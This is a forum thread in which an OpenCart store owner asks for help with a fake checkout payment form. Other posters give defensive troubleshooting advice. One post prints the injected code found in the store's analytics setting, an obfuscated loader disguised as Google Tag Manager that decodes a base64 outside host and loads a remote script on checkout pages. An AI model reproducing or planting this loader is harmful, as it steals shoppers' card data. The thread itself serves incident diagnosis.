Post by iplocker » Wed Nov 03, 2021 3:49 pm

Hello.
It seems we ve been hacked with a fake form at the checkout : https://prnt.sc/1y92zrj
Fake-Payment-Form.png

Fake Form Payment at Checkout of Opencart - Fake-Payment-Form.png (176.15 KiB) Viewed 2436 times

Post-Url.png

Post Url - Post-Url.png (370.91 KiB) Viewed 2424 times

I have compare the default installation of OC 3.0.3.6 and Journal and I ve got nothing .
ALso search the db for the
which seems its calling but got nothing too .
Any other idea how to approach this ?
Thanks
Last edited by iplocker on Wed Nov 03, 2021 4:07 pm, edited 2 times in total.

Active Member

Posts

Joined
Sun May 26, 2013 6:39 pm


Post by imdevlper18 » Wed Nov 03, 2021 3:59 pm

Which payment gateway you are using?

Opencart Extensions | Professional opencart support | Support Ticket | support@cartbinder.com


User avatar
Active Member

Posts

Joined
Sun May 11, 2014 2:04 pm

Post by iplocker » Wed Nov 03, 2021 4:10 pm

We are using https://www.opencart.com/index.php?rout ... n_id=35468
But compare the files of the extension it seems its not compromised also the Developer confirm that its not his extension hacked.
Thanks

Active Member

Posts

Joined
Sun May 26, 2013 6:39 pm


Post by imdevlper18 » Wed Nov 03, 2021 4:50 pm

The screenshot you showed is showing the card system was loaded within your website. This extension link that you sent is showing it is taking to the payment gateway page.

So maybe some other payment gateway is called on your checkout. You can check with your payment gateway installed. And disable the ones you don't use. If all are disabled and this card system is not the one that should come. That best get in touch with the developer and resolve.

Also better to change all your passwords related to the server and opencart.

Opencart Extensions | Professional opencart support | Support Ticket | support@cartbinder.com


User avatar
Active Member

Posts

Joined
Sun May 11, 2014 2:04 pm

Post by paulfeakins » Wed Nov 03, 2021 6:51 pm

Contact Astra, they'll add protection and also do an audit with a load of recommendations for a developer such as ourselves to implement.

UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk


User avatar
Guru Member
Online

Posts

Joined
Mon Aug 22, 2011 11:01 pm
Location - London Gatwick, United Kingdom

Post by JNeuhoff » Wed Nov 03, 2021 8:07 pm

Don't use the one-page checkout from Journal, that one has some serious bugs anyway.

As regards your issue with the payment gateway: You either need to contact the author of your payment extension, or the Journal support.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig


User avatar
Guru Member

Posts

Joined
Wed Dec 05, 2007 3:38 am


Post by ADD Creative » Wed Nov 03, 2021 8:14 pm

Can you work out where the script appears in the code of the web page? This might give you an idea where it is been added from. Use your web browser's 'View page source' and the developer tool to search. The script may not be in plain text, but encoded. So you will have to check every script tag on the page for anything suspicious.

Even if you do find the location and remove it, you'll still have to work out how it was added, as the attacker will likely just add it again. It's most likely a vulnerability in you extensions or theme. The Journal theme has had vulnerabilities in the past so check that and you extension are update.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by ASTRA Security Suite » Wed Nov 03, 2021 9:03 pm

Hey, here are the next steps that you can take:

1. Comparing default installation of OC 3.0.3.6 would have checked for only core files and not files related to extensions that you'd have installed. There might be a possibility of malware here that you would want to check for

2. It's also possible that malicious code is obfuscated and a simple string search in the database wouldn't find that. You'll need to do a thorough scan after you've found the encoded malicious code.

The steps above usually solve the problem against the symptoms you're facing. You can also read a detailed OpenCart malware removal guide here: https://www.getastra.com/blog/911/opencart-hacked/

User avatar

Posts

Joined
Tue Jan 31, 2017 11:37 pm

Post by xxvirusxx » Wed Nov 03, 2021 9:56 pm

ASTRA Security Suite wrote:
Wed Nov 03, 2021 9:03 pm
1. Comparing default installation of OC 3.0.3.6 would have checked for only core files and not files related to extensions that you'd have installed.
And why not check installed extensions?

Upgrade Service | OC 2.3.0.2 PHP 8 | My Custom OC 3.0.3.8 | Buy me a beer


User avatar
Expert Member

Posts

Joined
Tue Jul 17, 2012 10:35 pm
Location - România

Post by EvolveWebHosting » Wed Nov 03, 2021 10:47 pm

iplocker wrote:
Wed Nov 03, 2021 3:49 pm
Hello.
It seems we ve been hacked with a fake form at the checkout : https://prnt.sc/1y92zrj
Fake-Payment-Form.png
Post-Url.png
I have compare the default installation of OC 3.0.3.6 and Journal and I ve got nothing .
ALso search the db for the
which seems its calling but got nothing too .
Any other idea how to approach this ?
Thanks
It would really help everyone out if you'd provide your domain and maybe some information about the extensions you have installed. Staying 'secretive' and not posting additional information makes it hard to troubleshoot. When did you notice this hack? Have you recently installed any new modules / extensions / theme to your site? When is the last time you updated your passwords and are they strong and unique? Which version of Opencart are you using? There's a lot that goes into the reason(s) a website gets hacked.

2 Week FREE Trial of our Shared Hosting plans (DIrectAdmin or cPanel) for new customers
2 Week FREE Trial of Astra Firewall and Malware Scanner
Visit our website for full details and to start your trial today - www.evolvewebhost.com


User avatar
Active Member

Posts

Joined
Fri Mar 27, 2015 11:13 pm
Location - Denver, Colorado, USA

Post by iplocker » Thu Nov 04, 2021 1:04 am

Hello.
I know its difficult to help without saying what site is but those informations are sensitive you know .
I have contact Journal Support and they find the malicious code at Google Analytics (the following code is copy paste from the db)
Google-Analytics.png

Google-Analytics.png (356.53 KiB) Viewed 2233 times

Code: Select all

-- Google Tag Manager --> <script>(function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObjects\']=a;r=s.createElement (g),m=s.getElementsByTagName(g)[0];if(i.location.href.indexOf(i.atob(a)) >0){r.async=1;r.src=\'https://\'+i.atob(o);m.parentNode.insertBefore(r,m)}}) (window,document,\'YWh1YS5mZm94LnNpdGUvNmZjMWM5YTYvc3RhdC5waHA=\',\'script\',\'//www.google-analytics.com/analytics.js\', \'Y2hlY2tvdQ==\',\'ga\');</script> <!-- End Google Tag Manager -->',
The thing is how they get access to inject the code there !!

I am using the latest Journal Theme 3.1.8 and OC 3.0.3.6 as I said in the first post .
Opencart unfortunately dont have logs in details what comes in 3.0.3.7 so I dont know if they are solving any security issue .

I have compare almost all my extensions OC and Journal with default installations and I was unable to trace something .
So I guess its hard to trace to security hole .

Thanks

Active Member

Posts

Joined
Sun May 26, 2013 6:39 pm


Post by imdevlper18 » Thu Nov 04, 2021 1:36 am

Had you given access to anyone for installing the Google tag manager?

Or may be you provided someone access to install some extension.

Or may be you installed some malicious software which injected this code.

It's hard to say. Anyways its good that you found out.

Regarding the way to know who injected the code. It is extremely tough. Because there can be N number of ways to do it.

Opencart Extensions | Professional opencart support | Support Ticket | support@cartbinder.com


User avatar
Active Member

Posts

Joined
Sun May 11, 2014 2:04 pm

Post by EvolveWebHosting » Thu Nov 04, 2021 7:03 am

iplocker wrote:
Thu Nov 04, 2021 1:04 am
Hello.
I know its difficult to help without saying what site is but those informations are sensitive you know .
Why is it sensitive to post your domain name? No one is asking for login credentials to your website or server. Your visitors know your domain name so why is it sensitive for the Opencart users to know it?

2 Week FREE Trial of our Shared Hosting plans (DIrectAdmin or cPanel) for new customers
2 Week FREE Trial of Astra Firewall and Malware Scanner
Visit our website for full details and to start your trial today - www.evolvewebhost.com


User avatar
Active Member

Posts

Joined
Fri Mar 27, 2015 11:13 pm
Location - Denver, Colorado, USA

Post by by mona » Thu Nov 04, 2021 12:05 pm

You can ask to DM your site to a person here who is trying to assist you - you can also post it and delete it afterwards.

After ruling out that it was done by a human with access to your admin side ?

Suggest you disable/remove any non-core extension you have.
Looks like something changed the google analytics code which is in the setting table.
That means it looks like one of your extensions has a backdoor which can write to the settings table.
and what that means is that they can do it again and to other settings as well.

DISCLAIMER:
You should not modify core files .. if you would like to donate a cup of coffee I will write it in a modification for you.


https://www.youtube.com/watch?v=zXIxDoCRc84


User avatar
Expert Member

Posts

Joined
Mon Jun 10, 2019 9:31 am

Post by paulfeakins » Thu Nov 04, 2021 7:46 pm

JNeuhoff wrote:
Wed Nov 03, 2021 8:07 pm
Don't use the one-page checkout from Journal
Don't use ANYTHING from Journal :laugh:

UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk


User avatar
Guru Member
Online

Posts

Joined
Mon Aug 22, 2011 11:01 pm
Location - London Gatwick, United Kingdom

Post by nickpapoutsis » Fri Nov 05, 2021 12:31 pm

paulfeakins wrote:
Thu Nov 04, 2021 7:46 pm
Don't use ANYTHING from Journal :laugh:
Everyone loves to hate on Journal but there's absolutely nothing as feature-rich and stable as Journal's latest versions.

And no, the default theme is extremely restrictive, unless you have enough money and a team of developers to replicate Journal's most basic features.

I'd love to be able to suggest something else but it's ether the default one (maybe with some extra CSS like yours) or Journal, everything else is "my way or the highway", if they even work properly.

User avatar
New member

Posts

Joined
Mon Mar 25, 2019 7:49 am

Post by iplocker » Fri Nov 05, 2021 8:53 pm

I dont know from where the inject of the malicious code has been made as we never give access to 3rd ppls and we also install extensions from the Marketplace of Opencart .
So its hard to investigate it further so the only thing we can do is make the basic steps we see in some sites and to Astra blog site to secure the site .
Also Opencart releases will help if it was with more details about the new versions , I mean we have 3.0.3.6 , we see in the logs details of the new 3.0.3.7 :
3.0.3.8 RTL related issues resolved Resolved other Github issues. Version released by https://webkul.com/
So its not possible to know if they are security fixes or not .
Opencart needs logs with specific things that they have made .
Thanks

Active Member

Posts

Joined
Sun May 26, 2013 6:39 pm


Post by EvolveWebHosting » Fri Nov 05, 2021 9:02 pm

iplocker wrote:
Fri Nov 05, 2021 8:53 pm
I dont know from where the inject of the malicious code has been made as we never give access to 3rd ppls and we also install extensions from the Marketplace of Opencart .
So its hard to investigate it further so the only thing we can do is make the basic steps we see in some sites and to Astra blog site to secure the site .
Also Opencart releases will help if it was with more details about the new versions , I mean we have 3.0.3.6 , we see in the logs details of the new 3.0.3.7 :
3.0.3.8 RTL related issues resolved Resolved other Github issues. Version released by https://webkul.com/
So its not possible to know if they are security fixes or not .
Opencart needs logs with specific things that they have made .
Thanks
Best of luck to you in getting this resolved. Unfortunately, I'm unable to help any further without a URL for your website.

2 Week FREE Trial of our Shared Hosting plans (DIrectAdmin or cPanel) for new customers
2 Week FREE Trial of Astra Firewall and Malware Scanner
Visit our website for full details and to start your trial today - www.evolvewebhost.com


User avatar
Active Member

Posts

Joined
Fri Mar 27, 2015 11:13 pm
Location - Denver, Colorado, USA

Post by ADD Creative » Tue Nov 09, 2021 1:20 am

iplocker wrote:
Fri Nov 05, 2021 8:53 pm
I dont know from where the inject of the malicious code has been made as we never give access to 3rd ppls and we also install extensions from the Marketplace of Opencart .
So its hard to investigate it further so the only thing we can do is make the basic steps we see in some sites and to Astra blog site to secure the site .
Also Opencart releases will help if it was with more details about the new versions , I mean we have 3.0.3.6 , we see in the logs details of the new 3.0.3.7 :
3.0.3.8 RTL related issues resolved Resolved other Github issues. Version released by https://webkul.com/
So its not possible to know if they are security fixes or not .
Opencart needs logs with specific things that they have made .
Thanks
Sadly there are no detailed change logs, but you can see the commit history.
https://github.com/opencart/opencart/co ... ...3.0.3.7
https://github.com/opencart/opencart/co ... ...3.0.3.8

There were a few security patches. These would unlikely be the cause, unless you clicked on a malicious link that went to your admin and you then logged in. It far more likely to be a flaw with an extension or your theme. Finding the cause can be hard. Some thing to check would be.

Check your files against clean downloads of the sames versions of OpenCart your theme and your extensions.

Check both the OpenCart and PHP error logs. These might give you a clue as some attacks or attempted attacks will generate errors. Certain attacks rely on error messages, so make sure you site has them switch off in all 3 places that need to be set to off.

Check you web access log around the time you think everything happened. Look for GET requests with suspicious query strings, such as SQL inserts of some sore of encoding. Look for POST requests that seem out of place or from uncommon user agents. Look for access to your admin from unknown IP addresses.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by vidalleke » Tue May 17, 2022 9:14 pm

We also got hacked with the same method!

Newbie

Posts

Joined
Thu Nov 19, 2020 4:56 pm
Who is online

Users browsing this forum: No registered users and 264 guests